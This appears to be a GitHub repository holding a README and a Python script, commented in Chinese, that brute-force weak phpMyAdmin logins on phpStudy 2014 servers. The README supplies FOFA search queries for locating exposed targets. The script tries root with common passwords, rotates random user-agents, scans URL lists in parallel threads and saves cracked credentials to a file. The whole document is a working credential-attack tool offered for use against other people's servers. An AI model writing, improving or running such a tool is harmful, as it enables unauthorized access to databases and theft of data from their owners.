├── README.md └── phpmyadmin2014.py /README.md: -------------------------------------------------------------------------------- 1 | # phpmyadmin2014 2 | phpmyadmin2014弱口令爆破 3 | ![be604719573897d54a254d56392aa2e](https://github.com/user-attachments/assets/a7a60851-dcc8-4baf-99ae-77e2a77fe3de) 4 | ``` 5 | fofa: 6 | "phpstudy" && title=="phpStudy 探针 2014 " 7 | body="phpstudy探针" && title="phpStudy 探针 2014" 8 | ``` 9 | -------------------------------------------------------------------------------- /phpmyadmin2014.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import requests 3 | import concurrent.futures 4 | import sys 5 | import random 6 | 7 | def bao(url): 8 | url = url + '/phpmyadmin/index.php' 9 | username = ['root'] 10 | password = ['123456', '111111', 'root'] # 对网站用户名和密码进行爆破! 11 | for i in username: 12 | for j in password: 13 | data = { 14 | "pma_username": i, 15 | "pma_password": j, 16 | "server": "1", 17 | } 18 | try: 19 | #读取 user-agents.txt 文件中的所有 user-agent 随机选择一个 user agent 20 | with open('user-agents.txt', 'r') as f: 21 | useragents = f.readlines() 22 | random_useragent = random.choice(useragents).strip() 23 | headers = {'User-Agent': random_useragent} 24 | r = requests.post(url, data=data, headers=headers, verify=False, allow_redirects=True, timeout=5) 25 | if r.status_code == 200 and 'phpMyAdmin phpStudy 2014' in r.text: 26 | print('\033[1;31m[+]%s Login Success! username:%s & password:%s\033[0m' % (url, i, j)) 27 | with open('results.txt', 'a') as f: 28 | f.write(url + ' username:%s & password:%s' % (i, j) + '\n') 29 | # 登录成功退出 30 | break 31 | else: 32 | # print('Login False' % url) 33 | pass 34 | except requests.exceptions.ConnectionError as e: 35 | print(f"连接失败") 36 | break 37 | def pl(filename): 38 | with open(filename, 'r',encoding='utf-8') as f: 39 | urls = [line.strip() for line in f.readlines()] 40 | return urls 41 | 42 | def help(): 43 | helpinfo = """ _ _ _ ___ ___ __ _ _ 44 | | | | | (_) |__ \ / _ \/_ | || | 45 | _ __ | |__ _ __ _ __ ___ _ _ __ _ __| |_ __ ___ _ _ __ ) | | | || | || |_ 46 | | '_ \| '_ \| '_ \| '_ ` _ \| | | |/ _` |/ _` | '_ ` _ \| | '_ \ / /| | | || |__ _| 47 | | |_) | | | | |_) | | | | | | |_| | (_| | (_| | | | | | | | | | |_ / /_| |_| || | | | 48 | | .__/|_| |_| .__/|_| |_| |_|\__, |\__,_|\__,_|_| |_| |_|_|_| |_(_)____|\___/ |_| |_| 49 | | | | | __/ | 50 | |_| |_| |___/ 51 | """ 52 | print(helpinfo) 53 | print("phpmyadmin2014".center(100, '*')) 54 | print(f"[+]{sys.argv[0]} -u --url http://www.xxx.com 即可进行单个漏洞检测") 55 | print(f"[+]{sys.argv[0]} -f --file targetUrl.txt 即可对选中文档中的网址进行批量检测") 56 | print(f"[+]{sys.argv[0]} -h --help 查看更多详细帮助信息") 57 | print("--@ztomato".rjust(100," ")) 58 | 59 | def main(): 60 | parser = argparse.ArgumentParser(description='phpmyadmin2014弱口令漏洞单批检测脚本@ztomato') 61 | parser.add_argument('-u','--url', type=str, help='单个漏洞网址') 62 | parser.add_argument('-f','--file', type=str, help='批量检测文本') 63 | parser.add_argument('-t','--thread',type=int, help='线程,默认为5') 64 | args = parser.parse_args() 65 | thread = 5 66 | if args.thread: 67 | thread = args.thread 68 | if args.url: 69 | bao(args.url) 70 | elif args.file: 71 | urls = pl(args.file) 72 | with concurrent.futures.ThreadPoolExecutor(max_workers=thread) as executor: 73 | executor.map(bao, urls) 74 | else: 75 | help() 76 | if __name__ == '__main__': 77 | main() --------------------------------------------------------------------------------